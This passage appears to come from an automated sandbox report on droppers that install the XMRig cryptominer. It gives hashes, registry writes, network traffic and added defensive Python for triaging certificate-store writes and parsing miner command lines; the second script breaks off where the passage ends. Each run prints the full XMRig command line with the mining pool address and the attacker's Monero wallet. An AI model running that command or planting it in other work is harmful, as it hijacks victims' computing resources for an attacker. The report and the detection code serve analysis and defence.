| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2572-16-0x000001B947F90000-0x000001B947FB0000-memory.dmp
memory/2572-17-0x000001B947FD0000-0x000001B947FF0000-memory.dmp
memory/2572-18-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-20-0x000001B947FF0000-0x000001B948010000-memory.dmp
memory/2572-19-0x000001B9DA9C0000-0x000001B9DA9E0000-memory.dmp
memory/2572-21-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-22-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-25-0x000001B947FF0000-0x000001B948010000-memory.dmp
memory/2572-24-0x000001B9DA9C0000-0x000001B9DA9E0000-memory.dmp
memory/2572-23-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-26-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-27-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-28-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-29-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-30-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-31-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-32-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-33-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-34-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-35-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-36-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-37-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-38-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-39-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-40-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-41-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-42-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-43-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-44-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-45-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-46-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-47-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-48-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-49-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-50-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-51-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-52-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-53-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-54-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-55-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-56-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-57-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-58-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-59-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-60-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-61-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-62-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-63-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-64-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-65-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-66-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-67-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-68-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-69-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-70-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-71-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-72-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-73-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-74-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-75-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-76-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-77-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-78-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-79-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-80-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-81-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-82-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-83-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-84-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1807s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2916 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3224-16-0x0000027FEAFE0000-0x0000027FEB000000-memory.dmp
memory/3224-17-0x0000027FECA20000-0x0000027FECA40000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3036 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3036 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3680 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3680 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:01
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 512 wrote to memory of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 512 wrote to memory of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:49
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value not reproduced) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value not reproduced) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
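The thumbprint in this key path is the SHA-1 of the certificate being cached, and the store is AuthRoot, the cache that the Windows automatic root update fills through CryptoAPI when a chain is built to a root not yet present on the machine. The writer is the dropper, and the network table for this run shows TLS connections to github.com and objects.githubusercontent.com, so this write is the side effect expected of such a download rather than an attacker-installed root; a write under ROOT or TrustedPublisher would be a different matter. The page does not reproduce the Blob value, so the added example below, which is not part of the sandbox report, constructs a blob of its own around a placeholder certificate body to show how to walk the Blob's property entries, recover the DER, recompute the thumbprint and rank the write by store. The store severities are this example's own convention.

```python
import hashlib
import struct
from typing import Dict

# CryptoAPI property IDs that appear in a serialized certificate Blob.
CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32  # the DER-encoded certificate itself

# Meaning of the store name that precedes \Certificates\<thumbprint> in the key
# path. Severities are this example's triage convention, not a Windows concept.
STORE_SEVERITY = {
    "AuthRoot": ("low", "automatic root update cache; CryptoAPI fills it on demand"),
    "ROOT": ("high", "locally trusted root; the automatic update does not write here"),
    "CA": ("medium", "locally trusted intermediate"),
    "TrustedPublisher": ("high", "publisher whose signed code runs without prompts"),
    "Disallowed": ("high", "explicit distrust list; additions can block legitimate code"),
}


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Split a serialized certificate Blob into {property_id: data}.

    Each entry is DWORD PropId, DWORD reserved (always 1), DWORD cbData and
    then cbData bytes, all little-endian.
    """
    props: Dict[int, bytes] = {}
    off = 0
    while off + 12 <= len(blob):
        prop_id, reserved, size = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + size > len(blob):
            raise ValueError(f"malformed property entry at offset {off - 12}")
        props[prop_id] = blob[off:off + size]
        off += size
    if off != len(blob):
        raise ValueError("trailing bytes after the last property")
    return props


def build_cert_blob(der: bytes) -> bytes:
    """Inverse of parse_cert_blob; used only to construct the sample below."""
    sha1 = hashlib.sha1(der).digest()
    out = b""
    for prop_id, data in ((CERT_SHA1_HASH_PROP_ID, sha1), (CERT_CERT_PROP_ID, der)):
        out += struct.pack("<III", prop_id, 1, len(data)) + data
    return out


def thumbprint_from_blob(blob: bytes) -> str:
    """SHA-1 over the stored DER, upper-case hex, the way Windows names the key."""
    der = parse_cert_blob(blob)[CERT_CERT_PROP_ID]
    return hashlib.sha1(der).hexdigest().upper()


def triage_cert_store_write(key_path: str, blob: bytes) -> dict:
    """Classify one Set value on ...\\SystemCertificates\\<store>\\Certificates\\<thumb>\\Blob."""
    parts = key_path.split("\\")
    idx = parts.index("Certificates")
    store, key_thumb = parts[idx - 1], parts[idx + 1].upper()
    actual_thumb = thumbprint_from_blob(blob)
    severity, note = STORE_SEVERITY.get(store, ("medium", "unrecognised store"))
    if actual_thumb != key_thumb:
        # The key name is only a label; the stored DER is what ends up trusted.
        severity = "high"
        note = f"key name {key_thumb} does not match stored certificate {actual_thumb}"
    return {"store": store, "thumbprint": actual_thumb, "severity": severity, "note": note}


# Constructed sample: a placeholder DER body (a minimal SEQUENCE, not a real
# certificate) stored under the same AuthRoot path this report records. The
# real Blob is not reproduced on the page, so the key name is derived from
# the placeholder so that the two agree.
SAMPLE_DER = bytes.fromhex("3003020101")
SAMPLE_BLOB = build_cert_blob(SAMPLE_DER)
SAMPLE_KEY = (
    "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\"
    + hashlib.sha1(SAMPLE_DER).hexdigest().upper()
    + "\\Blob"
)

if __name__ == "__main__":
    print(triage_cert_store_write(SAMPLE_KEY, SAMPLE_BLOB))
```

On a live host the Blob bytes come straight from the registry value; with those, the thumbprint check tells you whether the certificate named by the key is the one actually stored, and the store name tells you how much that matters.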
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2304 wrote to memory of 3084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2304 wrote to memory of 3084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
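The command line above is identical in every run on this page and carries every indicator a responder needs: the pool (pool.hashvault.pro on port 80 with --tls, so a TLS ClientHello arrives on a port where proxies expect plaintext), the Monero payout address in --user, the SHA-256 certificate pin in --tls-fingerprint, and --donate-level, an option only XMRig understands. Two of the signatures around it read differently in that light: SeLockMemoryPrivilege is what XMRig requests to back RandomX with large pages, and the parent-to-child WriteProcessMemory rows are the ordinary process-start path, not evidence of injection on their own. The added example below, which is not part of the sandbox report, extracts those fields from a process command line and scores them. The first sample line is the one from this report; the second, a benign updater that also uses --url and --tls, is hypothetical, and the option table is a subset of XMRig's CLI spellings chosen for this example.

```python
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the xmrig.exe command line recorded in this report,
# followed by a hypothetical benign program that shares two option names with
# it so the scoring has something to reject.
SAMPLE_COMMAND_LINES = [
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user "
    r"46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    r"--pass T --donate-level 1 --tls --tls-fingerprint "
    r"420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",
    r'"C:\Program Files\Example\updater.exe" --url https://updates.example.invalid/feed --tls',
]

# Monero standard (4...) and sub- (8...) addresses: 95 base58 characters, so no
# 0, O, I or l. Integrated addresses are 106 characters and are not matched.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
SHA256_HEX = re.compile(r"^[0-9a-fA-F]{64}$")

# XMRig options that take a value (short and long spellings) and pure flags.
VALUE_OPTS = {
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-a": "algo", "--algo": "algo",
    "--coin": "coin",
    "--donate-level": "donate_level",
    "--tls-fingerprint": "tls_fingerprint",
}
FLAG_OPTS = {"--tls", "-k", "--keepalive", "--nicehash", "-B", "--background", "--huge-pages"}


@dataclass
class MinerIOCs:
    image: str
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    wallet: Optional[str] = None
    wallet_is_monero: bool = False
    tls: bool = False
    tls_fingerprint: Optional[str] = None
    donate_level: Optional[int] = None
    reasons: List[str] = field(default_factory=list)

    @property
    def is_miner(self) -> bool:
        # Two independent miner-specific traits are required, so a lone --url
        # or --tls on an unrelated program does not trip the verdict.
        return len(self.reasons) >= 2


def _split_pool(url: str):
    """'stratum+tcp://host:port' or 'host:port' -> (host, port or None)."""
    hostport = re.sub(r"^[a-z+]+://", "", url, flags=re.IGNORECASE)
    host, sep, port = hostport.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return hostport, None


def parse_xmrig_cmdline(cmdline: str) -> MinerIOCs:
    # posix=False keeps Windows backslashes and quoted paths intact.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    ioc = MinerIOCs(image=tokens[0])
    opts = {}
    i = 1
    while i < len(tokens):
        name, has_eq, inline_val = tokens[i].partition("=")
        if name in VALUE_OPTS:
            if has_eq:
                value = inline_val
            else:
                i += 1
                value = tokens[i] if i < len(tokens) else ""
            opts[VALUE_OPTS[name]] = value
        elif name in FLAG_OPTS:
            opts[name] = True
        i += 1

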